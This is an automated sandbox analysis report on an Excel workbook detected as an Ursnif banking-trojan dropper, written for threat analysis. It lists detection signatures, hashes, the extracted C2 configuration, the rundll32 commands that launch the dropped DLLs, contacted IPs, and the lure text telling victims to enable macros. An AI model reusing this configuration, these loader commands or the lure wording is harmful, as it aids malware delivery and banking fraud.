Loading ...

Play interactive tourEdit tour

Analysis Report catalogue-41.xlsb

Overview

General Information

Sample Name:catalogue-41.xlsb
Analysis ID:382840
MD5:3ab9cf4d043027eae77763f1addd41af
SHA1:753abe817ad3a4b2c5cb71ea139924ac1179e6f1
SHA256:968278e0bd31a649e48f01fa8eac1291d41a5015dfcfed6ad45739a181a50b40
Tags:Hostgatorxlsb
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Machine Learning detection for dropped file
Office process drops PE file
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara detected Xls With Macro 4.0

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 4600 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 4276 cmdline: rundll32 ..\fikftkm.thj,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4876 cmdline: rundll32 ..\fikftkm.thj1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6356 cmdline: rundll32 ..\fikftkm.thj2,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6392 cmdline: rundll32 ..\fikftkm.thj3,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6424 cmdline: rundll32 ..\fikftkm.thj4,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Ursnif

[[{"RSA Public Key": "bUd4GFcFHo0e+ZYUbkHaTKXmZ1xEyxvy7Ha6j1WAZbQ7YvMdkqTfD1vHD2y2CmFTRrLK1w5iQroYI0mUpJ4xNknlY+BmJf4xpeJRxxK0RRNeRbW5unSB2vXqxvlTgz6vNZY+9zeztuP2jXKpIm0/s+YxWnsT7eWUtQtD38NlsAPtJdp+3rBxjzAWNKQj7wMA"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]]

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.270814494.00000000041A0000.00000004.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.rundll32.exe.41a0000.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

        Sigma Overview

        No Sigma rule has matched

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 4.2.rundll32.exe.41a0000.2.raw.unpackMalware Configuration Extractor: Ursnif [[{"RSA Public Key": "bUd4GFcFHo0e+ZYUbkHaTKXmZ1xEyxvy7Ha6j1WAZbQ7YvMdkqTfD1vHD2y2CmFTRrLK1w5iQroYI0mUpJ4xNknlY+BmJf4xpeJRxxK0RRNeRbW5unSB2vXqxvlTgz6vNZY+9zeztuP2jXKpIm0/s+YxWnsT7eWUtQtD38NlsAPtJdp+3rBxjzAWNKQj7wMA"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]]
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\fikftkm.thj1Joe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0504[1].gifJoe Sandbox ML: detected
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
        Source: unknownHTTPS traffic detected: 108.167.180.111:443 -> 192.168.2.3:49714 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 5.100.152.162:443 -> 192.168.2.3:49716 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 43.229.135.209:443 -> 192.168.2.3:49717 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.3:49718 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 50.116.95.68:443 -> 192.168.2.3:49720 version: TLS 1.2

        Software Vulnerabilities:

        barindex
        Document exploit detected (drops PE files)Show sources
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: 0504[1].gif.0.drJump to dropped file
        Document exploit detected (UrlDownloadToFile)Show sources
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
        Document exploit detected (process start blacklist hit)Show sources
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
        Source: global trafficDNS query: name: ethereality.info
        Source: global trafficTCP traffic: 192.168.2.3:49714 -> 108.167.180.111:443
        Source: global trafficTCP traffic: 192.168.2.3:49714 -> 108.167.180.111:443
        Source: Joe Sandbox ViewIP Address: 5.100.155.169 5.100.155.169
        Source: Joe Sandbox ViewIP Address: 5.100.152.162 5.100.152.162
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownDNS traffic detected: queries for: ethereality.info
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://api.aadrm.com/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://api.cortana.ai
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://api.diagnostics.office.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://api.microsoftstream.com/api/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://api.office.net
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://api.onedrive.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://apis.live.net/v5.0/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://augloop.office.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://augloop.office.com/v2
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://cdn.entity.
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://clients.config.office.net/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://config.edge.skype.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://cortana.ai
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://cortana.ai/api
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://cr.office.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://dataservice.o365filtering.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://dataservice.o365filtering.com/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://dev.cortana.ai
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://devnull.onenote.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://directory.services.
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://graph.ppe.windows.net
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://graph.ppe.windows.net/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://graph.windows.net
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://graph.windows.net/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://incidents.diagnostics.office.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://lifecycle.office.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://login.microsoftonline.com/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://login.windows.local
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://management.azure.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://management.azure.com/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://messaging.office.com/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://ncus.contentsync.
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://ncus.pagecontentsync.
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://officeapps.live.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://onedrive.live.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://outlook.office.com/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://outlook.office365.com/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://powerlift.acompli.net
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://settings.outlook.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://staging.cortana.ai
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://store.office.com/addinstemplate
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://tasks.office.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://templatelogging.office.com/client/log
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://webshell.suite.office.com
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://wus2.contentsync.
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://wus2.pagecontentsync.
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drString found in binary or memory: https://www.odwebp.svc.ms
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownHTTPS traffic detected: 108.167.180.111:443 -> 192.168.2.3:49714 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 5.100.152.162:443 -> 192.168.2.3:49716 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 43.229.135.209:443 -> 192.168.2.3:49717 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.3:49718 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 50.116.95.68:443 -> 192.168.2.3:49720 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000004.00000002.270814494.00000000041A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 4.2.rundll32.exe.41a0000.2.raw.unpack, type: UNPACKEDPE

        E-Banking Fraud:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000004.00000002.270814494.00000000041A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 4.2.rundll32.exe.41a0000.2.raw.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
        Source: Screenshot number: 4Screenshot OCR: Enable Editing 9 10 from the yellow bar above 11 12 @ Once You have Enable Editing, please click
        Source: Screenshot number: 4Screenshot OCR: Enable Content 13 from the yellow bar above 14 15 " WHY I CANNOT OPEN THIS DOCUMENT? 17 18 ::
        Source: Screenshot number: 12Screenshot OCR: Enable Editing 9 10 from the yellow bar above 11 RunDLL X 12 @ Once You have Enable Editing, pl
        Found Excel 4.0 Macro with suspicious formulasShow sources
        Source: catalogue-41.xlsbInitial sample: EXEC
